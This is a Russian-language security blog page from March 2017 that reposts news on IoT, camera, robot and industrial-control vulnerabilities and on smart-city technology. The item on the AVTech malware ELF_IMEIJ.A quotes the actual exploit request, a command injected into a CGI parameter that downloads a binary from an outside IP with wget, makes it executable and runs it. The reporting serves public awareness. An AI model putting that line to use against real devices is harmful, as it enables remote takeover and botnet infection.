Мой основной блог ZLONOV.ru (RSS-лента) | Презентации и документы: SlideShare | Ссылка на Twitter: @zlonov

24 марта 2017 г.

[ZLONOV.ru] Один день из жизни РусКрипто

ZLONOV.ru
Пост Один день из жизни РусКрипто опубликован на сайте ZLONOV.ru


Вы можете подписаться на обновления напрямую: RSS-лента
Презентации и документы: SlideShare
Ссылка на Twitter: @zlonov

Умнеющие города

Мы все наслышаны о тех социальных и экологических проблемах, которые возникают на фоне постоянной глобальной урбанизации. Однако, технологии умного города, кажется, способны дать ответы на многие из поставленных вопросов, и не только решить проблемы климатических изменений, перенаселения или чрезмерного потребления ресурсов – умные технологии способны сделать наши жизни еще удобнее и комфортнее. О каких технологиях идет речь?



Зеленые IoT инициативы


Мы уже писали о потенциале Интернета вещей в деле сохранения природы. Благодаря миллиардам встраиваемых датчиков государственные органы и компании имеют возможность более полно оценивать выброс углекислого газа и отслеживать уровень загрязнения. На Всемирном мобильном конгрессе 2017 года компании AT&T и GE объявили о начале партнерских отношений с целью разработки экологических IoT технологий для использования в городах Северной и Центральной Америки. Интеллектуальные узлы датчиков позволят реализовать новое поколение систем уличного освещения. Датчики будут полностью интегрированы в столбы освещения, что позволит муниципалитетам задействовать уже имеющиеся столбы, установив туда энергетически эффективные светодиодные лампы.

На пути к внедрению сетей 5-го поколения в умных городах


Сети 5G – это общий термин, обозначающий новое поколение телекоммуникационных стандартов. На Всемирном мобильном конгрессе мы видели много новостей об оптимизированных для IoT технологиях межмашинного взаимодействия и о планах запуска сетей LTE Cat NB-IoT, что будет способствовать развитию технологий 5G. Чтобы люди могли получить представление об открывающихся возможностях, Gemalto продемонстрировал на своем стенде в рамках MWC решение для освещения и подзарядки электромобилей в умном городе на базе eluminocity – технологии, разработанной совместно с нашими партнерами.

Это решение включает в себя интеллектуальные датчики и позволяет превратить столбы уличного освещения в умные платформы, которые подключаются к центральной системе управления и предполагают наряду со своей основной функцией самые различные варианты использования – теперь в них реализована регулировка яркости высокомощных светодиодных ламп по мере необходимости, что позволяет использовать их даже для предупреждения водителей и пешеходов. Кроме того, датчики, установленные на столбах освещения, способны определять, свободно ли расположенное под ними парковочное пространство, а владельцы электромобилей смогут выяснить расположение ближайшего доступного терминала для подзарядки и даже бронировать его с помощью своих смартфонов. Для дополнительного удобства, использование стандартных разъемов, использующихся в том или ином регионе, позволяет подзаряжать практически любые доступные сегодня на рынке модели электромобилей. Эта инновация раскрывает возможности создания еще более умных и экологичных городских систем.

Беспилотные автомобили


Одна из наших самых любимых инноваций этого года – беспилотный суперкар от компании Roborace, первый в мире беспилотный гоночный болид. Он способен развивать невероятную скорость – до 320 км/ч, и перемещается, используя на данные, собираемые с датчиков и шести камер. Для управления автомобилем используются алгоритмы, разработанные инженерами Roborace. Возможно, в будущем звездами автоспорта станут не гонщики, а компьютерные инженеры, которые работают над стратегией победы.

Создание Интернета доверенных вещей


Чтобы умный город мог надежно функционировать, лежащая в его основе инфраструктура должна быть умной и защищенной. К примеру, для создания функциональной системы уличного освещения необходимо наличие защищенного соединения между лампами и централизованной системой управления. Это сложный процесс, в котором необнаруженная уязвимость в одной части системы способна привести к компрометации безопасности всей системы. Поэтому тем, кто занимается созданием критически важной инфраструктуры и решений для умных городов, следует очень внимательно и со всех сторон продумывать архитектуру своих сетей и тех систем, которые они соединяют, будь то автопарковка, система управления трафиком или система утилизации отходов.

Чтобы добиться нужного результата, государственным органам и другим заинтересованным сторонам необходимо научиться подключать, защищать и монетизировать свою IoT стратегию, подбирая сочетание безопасных сетевых решений, гибких платформ монетизации и эффективных систем управления жизненным циклом.

Источник: Хабрахабр / Информационная безопасность / Интересные публикации

Злоумышленники могут отключить камеры наблюдения Nest Dropcam посредством Bluetooth-атаки

Независимый исследователь Джейсон Дойл (Jason Doyle) предупреждает об уязвимостях в камерах наблюдения Nest Dropcam и Dropcam Pro. Устройства, которые должны защищать владельцев от грабителей, можно легко обезвредить с безопасного расстояния.

Дойл сообщает, что в прошивке версии 5.2.1 содержатся три уязвимости, при помощи которых можно спровоцировать отказ работы камеры через обычный Bluetooth. Еще в октябре 2016 года исследователь уведомил о проблемах разработчиков Nest и холдинга Alphabet Inc (Google), которому с 2014 года принадлежит компания. Однако патчей по-прежнему нет, и Дойл решил рассказать об уязвимостях публично.

Два бага позволяют спровоцировать переполнение буфера устройства, просто пингуя камеру посредством Bluetooth Low Energy (BLE). Дело в том, что Bluetooth в камерах Nest активен всегда и включен по умолчанию. В результате можно добиться аварийной перезагрузки девайса, к примеру, посылая ему длинные пароли для Wi-Fi. Еще одна проблема вынуждает устройство разорвать текущее соединение с сетью. Для этого достаточно передать камере новый Wi-Fi SSID, заставив ее попытаться соединиться с несуществующей сетью. На разрыв соединения и переподключение уйдет от 60 до 90 секунд.

Дойл пишет, что если эксплуатировать эти уязвимости непрерывно, камера фактически перестанет работать и не будет записывать видео во время многочисленных перезагрузок и отключений от сети. Это может стать для злоумышленников настоящим подарком. Хотя для осуществления атак нужно находиться в зоне действия BLE, это вряд ли будет проблемой для тех, кто и так собирается проникнуть в дом.

Дойл предупреждает, что он не нашел способа обезопасить устройства Nest до выхода патча, так как отключить Bluetooth в камерах невозможно.

Издание The Register сообщает, что разработчики Nest знают о проблеме и уже работают над исправлением, однако точные сроки выхода патча пока названы не были.


Источник: «Хакер»

Хакеры атакуют АСУ ТП, однако опасаться «кибер Перл-Харбора» не стоит

За последние несколько лет американские политики неоднократно высказывали мнение, что США грозит «кибер Перл-Харбор». Под данной аналогией подразумеваются возможные кибератаки на объекты критической инфраструктуры (к примеру, на атомные электростанции), способные вызвать катастрофические последствия. Подобные сюжеты встречаются в ряде голливудских фильмов, однако специалисты, отвечающие за безопасность АСУ ТП, на самом деле не очень беспокоятся о «кибер Перл-Харборе». Как бы то ни было, недооценивать угрозу нельзя.

По словам основателя ИБ-компании Dragos, бывшего служащего ВВС США Роберта Ли (Robert Lee), эксперты в области защиты АСУ ТП не принимают всерьез угрозу целевых атак с использованием вредоносного ПО. «Пока что угрозы уничтожения электростанций нет. Не похоже, чтобы объекты перестали работать, и какой-то случайный вредоносный код в сетях электростанций, водоочистных сооружений или даже атомных электростанций мог привести к печальным последствиям. Он может затронуть операции, и это нехорошо. Однако это еще не конец света и вовсе не является проблемой безопасности», - сообщил Ли в интервью журналистам Motherboard.

Тем не менее, не стоит недооценивать противников, уже сейчас пытающихся совершать целевые атаки и из года в год совершенствующих свои навыки, отметил Ли. Эксперт и его команда изучили образцы вредоносов, обнаруженные в сетях АСУ ТП. Помимо случайно попавшего в сети устаревшего вредоносного ПО, исследователи также обнаружили десятки образцов кода, специально разработанных для атак на АСУ ТП.

В ближайшее время Ли опубликует доклад об обнаруженных двух новых образцах вредоносного ПО, использовавшихся в ходе атак на промышленные предприятия. В ходе одной из кампаний злоумышленники использовали вредоносный PDF-документ об управлении ядерными материалами. В ходе второй кампании киберпреступники маскировали вредоносное ПО под легитимное, предназначенное для ПЛК производства Siemens. Данный вредонос инфицировал порядка десяти промышленных объектов, в основном расположенных в США. Стоит отметить, в обоих случаях ПО предназначалось не для вмешательства в промышленные процессы, а для шпионажа.


Источник: Новости - SecurityLab.ru

21 марта 2017 г.

Грабители могут отключить камеры видеонаблюдения Nest по Bluetooth

Камеры видеонаблюдения Dropcam и Dropcam Pro от компании Nest (принадлежит Google) содержат уязвимости, позволяющие атаковать их по Bluetooth. Исследователь безопасности Джейсон Дойл (Jason Doyle) обнаружил в версии прошивки 5.2.1 три проблемы, с помощью которых злоумышленники могут отключить запись – очень удобно, если кто-то решит ограбить «защищенный» дом Nest.

Дойл уведомил Google о наличии уязвимостей еще в октябре прошлого года, однако обновление до сих пор не выпущено, поэтому исследователь решил сообщить общественности о своих находках.

Две уязвимости позволяют вызвать переполнение буфера путем продолжительного пинга устройства через Bluetooth LE. В итоге работа камеры аварийно завершается, и устройство перезагружается.

С помощью третьей уязвимости злоумышленник может отправить камере идентификатор несуществующей сети. Устройство отключится от своей сети и попытается подключиться к несуществующей. Через полторы минуты возобновится подключение к предыдущей сети, однако в течение этого времени запись камеры будет отключена. Если повторять данный трюк, можно отключить запись на длительный отрезок времени.

Для эксплуатации уязвимостей достаточно лишь находиться в радиусе действия Bluetooth LE. По данным издания The Register, Google уже подготовила патч и в скором времени выпустит его.


Источник: Новости - SecurityLab.ru

[ZLONOV.ru] Код ИБ Уфа. Презентации не будет

ZLONOV.ru
Пост Код ИБ Уфа. Презентации не будет опубликован на сайте ZLONOV.ru


Вы можете подписаться на обновления напрямую: RSS-лента
Презентации и документы: SlideShare
Ссылка на Twitter: @zlonov

17 марта 2017 г.

В Росгвардии опровергли информацию о создании киберразведки

Информация о создании в структуре Росгвардии подразделения, которое будет заниматься киберразведкой, не соответствует действительности. Об этом сообщила пресс-служба ведомства.

Ранее информагентство «Росбалт» опубликовало информацию о якобы создании в структуре Росгвардии подразделения, которое будет заниматься киберразведкой с целью выявления экстремистских угроз.

Как указывается в пресс-релизе, в Росгвардии принимаются необходимые меры по противодействию DDoS-атакам на ее информационные ресурсы, однако киберразведка не входит в задачи ведомства.

«Деятельность Росгвардии определена Указом Президента РФ от 5.04.2016 года № 157 и Федеральным законом от 3 июля 2016 г. N 226-ФЗ. Каких-либо иных полномочий, не наделенных данными нормативными правовыми документами, войска национальной гвардии не имеют», - прокомментировал первый заместитель директора Федеральной службы войск национальной гвардии генерал-полковник Сергей Меликов.


Источник: Новости - SecurityLab.ru

В роботах дистанционного присутствия Double Robotics обнаружили несколько уязвимостей

Роботы дистанционного присутствия, они же роботы с эффектом присутствия (Telepresence Robot) – это мобильные устройства для конференций, которые позволяют удаленному пользователю присутствовать в офисе, учебном заведении или другом месте, имея возможность поддерживать диалог «лицом к лицу». Такие устройства часто описают как «планшет на палке», и такие роботы действительно популярны и востребованы во многих компаниях и организациях.

Исследователи Rapid7 сообщили, что устройства Double Robotics, как и многие другие IoT-гаджеты, подвержены сразу нескольким серьезным уязвимостям, в том числе проблеме, которая в теории позволяет атакующему полностью перехватить управление роботом.

Так, одна из найденных специалистами уязвимостей, позволяет неавторизованному атакующему получить доступ к информации об устройстве, включая координаты GPS, серийный номер, информацию о текущем и предыдущих «водителях» робота, данных сессий и так далее. Причем добиться всего этого можно, просто изменив один из параметров в адресе URL.

Вторая проблема связана со специальными токенами driver_token, которые создаются во время привязки робота к определенному аккаунту. Дело в том, что эти токены не имеют срока действия, никогда не меняются и не утрачивают силу. В итоге, если токен попадет в руки злоумышленника, тот сможет делать с устройством все, что пожелает.

Третья уязвимость заключается в том, что во время спаривания робота с мобильным приложением через Bluetooth пользователю не нужно знать PIN-код. То есть атакующий, вооружившийся мощной антенной, сможет без труда контролировать устройство с расстояния около километра.

Обо всех проблемах исследователи сообщили разработчикам Double Robotics еще в декабре 2016 года. В январе компания устранила первые две из вышеперечисленных уязвимостей, а вот спаривание через Bluetooth, по мнению разработчиков, не является проблемой. В компании считают, для осуществления атаки злоумышленник должен находиться достаточно близко, а также с роботом можно связать только одно устройство за раз, но не два одновременно.


Источник: «Хакер»

10 марта 2017 г.

Обнаружено новое вредоносное ПО для IoT-устройств

Долгое время ОС на базе ядра Linux остаются приоритетными у производителей устройств «Интернета вещей» (IoT). В связи с этим для Linux появляются все новые и новые угрозы. В прошлом году большую известность приобрело вредоносное ПО Mirai, инфицирующее IoT-устройства и включающее их в ботнет.

Исследователи Trend Micro сообщили о новом образце вредоносного ПО для Linux под названием ELF_IMEIJ.A (по классификации Trend Micro). Вредонос эксплуатирует известные уязвимости в системах безопасности производства крупной тайваньской компании AVTech. Проблемы были обнаружены экспертами Search-Lab. Исследователи пытаются связаться с производителем еще с октября 2016 года, однако безуспешно.

Уязвимости в устройствах AVTech позволяют выполнить удаленный файл на стороне атакуемого сервера с помощью скриптов cgi-bin. С целью проэксплуатировать уязвимость злоумышленник отправляет на произвольный IP-адрес запрос POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http:// 192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1. С помощью уязвимости хакер может внедрить команду и запустить процесс загрузки на устройство вредоносного ПО.

Точкой входа для ELF_IMEIJ.A служат IP-камеры, системы видеонаблюдения и сетевые записывающие устройства производства AVTech. Попав на устройство, вредонос собирает данные о системе и сетевой активности. ПО также способно получать от киберпреступников команды и выполнять их, например, для запуска DDoS-атаки или самоуничтожения. Устройства, находящиеся в одной сети с зараженным, также подвергаются опасности.


Источник: Новости - SecurityLab.ru

9 марта 2017 г.

Обнаружены 185 тыс. доступных через интернет уязвимых IP-камер

ИБ-эксперты ожидают появления нового ботнета – свыше 185 тыс. IP-камер, поставляемых 354 компаниями под 1200 торговыми марками, содержат уязвимый встроенный сервер. Как сообщает Пьер Ким (Pierre Kim) из Full Disclosure, проблемными являются панель администрирования GoAhead и незащищенный протокол, по которому осуществляется подключение к облачным серверам.

По данным Кима, поисковая система Shodan находит порядка 185 тыс. подключенных к интернету уязвимых IP-камер, открытых для кибератак. В использующемся в устройствах CGI-скрипте для конфигурации FTP содержится известная с 2015 года уязвимость, позволяющая удаленно выполнить код. С ее помощью атакующий может запускать команды с правами суперпользователя или настроить не требующий пароль Telnet-сервер.

В файловой системе есть папка /system/www/pem/ck.pem, содержащая сертификат разработчика Apple с закрытым ключом RSA и учетные данные для авторизации на web-сервере, доступные через символьные ссылки system.ini и system-b.ini. Также присутствует неавторизованный RTSP-сервер, и любой, у кого есть доступ к TCP-порту 10554, может видеть передающиеся данные. Подключение камер к облачным сервисам AWS, Alibaba и Baidu активировано по умолчанию, и все, что нужно для атаки – соответствующее мобильное приложение и серийный номер атакуемого устройства.

Как пояснил Ким, если камера подключена к интернету, между нею и приложением создается UDP-туннель, где в качестве реле используется облачный сервер. Данный туннель также может служить в качестве вектора для атаки. «Туннель обходит NAT и межсетевой экран, позволяя атакующему получить доступ к внутренним камерам (если они подключены к интернету) и с помощью брутфорс-атаки определить учетные данные», - сообщил исследователь.

В списке уязвимых устройств числятся IP-камеры 3Com, D-Link, Akai, Axis, Kogan, Logitech, Mediatech, Panasonic, Polaroid и Secam.


Источник: Новости - SecurityLab.ru

7 марта 2017 г.

Пользователи не доверяют слишком «умным» IoT-устройствам

Большинство пользователей с опаской относятся к устройствам «Интернета вещей» (IoT) и автоматизации предпочитают конфиденциальность своей частной жизни. Согласно исследованию компании Gartner, порядка двух третей пользователей беспокоятся о том, что IoT-устройства подслушивают их разговоры. Подобные опасения не беспочвенны, учитывая то и дело появляющиеся в СМИ новости о шпионящих за детьми игрушках или полицейских допросах Amazon Echo.

В online-опросе Gartner, проведенном во втором полугодии 2016 года, приняли участие порядка 10 тыс. жителей Великобритании, США и Австралии. Согласно результатам исследования, пользователи пока еще не спешат обзаводиться «умными» домами. Большинство участников опроса не считают необходимым приобретать IoT-устройства, несмотря на их очевидную пользу.

Три четверти респондентов предпочитают самостоятельно регулировать температуру и освещение в своих домах, и только четверть опрошенных привлекает идея «умных» гаджетов, способных предугадывать их пожелания и автоматически устанавливать соответствующие настройки.

18% участников опроса используют «умные» системы сигнализации (самый популярный IoT-продукт на сегодняшний день, по результатам исследования Gartner), автоматически оповещающие охранные фирмы о подозрительной активности. В домах 11% респондентов установлена сигнализация, оповещающая о подозрительной активности самих домовладельцев. 9% используют системы домашней автоматизации для управления освещением и отоплением.


Источник: Новости - SecurityLab.ru

5 марта 2017 г.

Американские хакеры срывали испытания баллистических ракет КНДР

Администрация экс-президента США Барака Обамы неоднократно атаковала компьютерные системы КНДР, чтобы срывать испытания Пхеньяном баллистических ракет. Об этом сообщила газета The New York Times.

По ее данным, Обама в 2014 году отдал приказ Пентагону усилить кибератаки в отношении КНДР. После этого Пхеньян стал испытывать значительные трудности при тестировании ракет, которые все чаще стали взрываться в воздухе или же отклоняться от курса. В итоге доля неудачных ракетных испытаний составила 88 процентов, пишет издание.

При этом отмечается, что нет достаточных данных, которые бы свидетельствовали, что неудачи КНДР были связаны именно с хакерской активностью США. А нынешние и бывшие представители оборонного ведомства утверждают, Вашингтон до сих пор не способен противодействовать развитию ядерной и ракетной программ Пхеньяна, передает vesti.ru.

Ранее газета The Wall Street Journal со ссылкой на свои источники сообщала, что администрация Трампа изучает, какие шаги ей следует предпринять в отношении Пхеньяна, не исключая при этом применения против КНДР военной силы.


Источник: Новости информационной безопасности - Anti-Malware.ru

3 марта 2017 г.

Уязвимости в «умных» медицинских приборах несут двойную угрозу

Устройства «Интернета вещей» (IoT) и в частности «умные» медицинские приборы вызывают большое беспокойство у экспертов в области безопасности. К примеру, в прошлом году были обнаружены уязвимости в инсулиновых помпах Johnson & Johnson и кардиостимуляторах St. Jude Medical, позволяющие осуществлять хакерские атаки. Казалось бы, производители «умных» медицинских устройств должны были пересмотреть свои политики безопасности, однако они не спешат что-либо менять.

Уязвимости в подключенном к Сети медицинском оборудовании таят двойную угрозу. Во-первых, злоумышленники могут взломать прибор и причинить вред пациенту (например, увеличить дозу препарата в инсулиновой помпе). Во-вторых, «дыра» в безопасности может стать отличной точной входа для проникновения в целую сеть медучреждения. Получив доступ к сети, злоумышленник может похитить конфиденциальную информацию или с помощью вымогательского ПО заблокировать работу систем и требовать выкуп за ее восстановление.

По данным Trend Micro, только в США через поисковик Shodan можно найти порядка 36 тыс. подключенных к интернету медицинских устройств. Многие из них используют устаревшие операционные системы. Более 3% приборов по-прежнему работают под управлением больше неподдерживаемой Windows XP, что облегчает хакерам задачу.


Источник: Новости - SecurityLab.ru

NMS RUGGEDCOM от Siemens уязвимы к CSRF и XSS

Системы управления корпоративной сетью (NMS), производимые Siemens, страдают от уязвимостей, позволяющих сторонним пользователям осуществлять администрирование.

В NMS-продуктах линейки RUGGEDCOM обнаружены два бага, открывающие возможность для подделки межсайтовых запросов (CSRF) и для межсайтового скриптинга (XSS). Группа быстрого реагирования на киберинциденты в сфере управления производственными процессами (ICS-CERT), работающая под эгидой министерства внутренней безопасности США, во вторник выпустила информационный бюллетень, в котором предупредила, что обе уязвимости допускают удаленный эксплойт, притом их использование не требует особых технических навыков.

NMS-системы Siemens используются по всему миру для мониторинга и управления сетями, преимущественно в таких отраслях, как энергетика, здравоохранение и транспорт. Согласно бюллетеню ICS-CERT, уязвимостям подвержены все версии станций RUGGEDCOM, работающих под Windows и Linux.

Баг CSRF более опасен, он оценен в 8,8 балла по шкале CVSS. Эксплойт в данном случае может повлечь непосредственное исполнение «административных операций», если жертва инициировала сессию и ее удастся склонить к подаче вредоносного запроса. Уязвимость XSS получила 6,3 балла по шкале CVSS, хотя ее эксплуатация позволяет непривилегированному пользователю «получить административные разрешения».

Разработчик призывает пользователей RUGGEDCOM произвести обновление до версии 2.1.0, содержащей патчи.

В текущем году ICS-CERT уже второй раз выпускает бюллетень, посвященный продуктам Siemens. В середине февраля эксперты предупредили владельцев устройств, использующих ПО SIMATIC Logon этой компании, о наличии уязвимости, эксплуатация которой позволяет обойти аутентификацию на уровне приложения. Проблема была решена в новом выпуске SIMATIC Logon.


Источник: Threatpost | Новости информационной безопасности

[ZLONOV.ru] Как настроить свой личный VPN-сервер за час-другой?

ZLONOV.ru
Пост Как настроить свой личный VPN-сервер за час-другой? опубликован на сайте ZLONOV.ru


Вы можете подписаться на обновления напрямую: RSS-лента
Презентации и документы: SlideShare
Ссылка на Twitter: @zlonov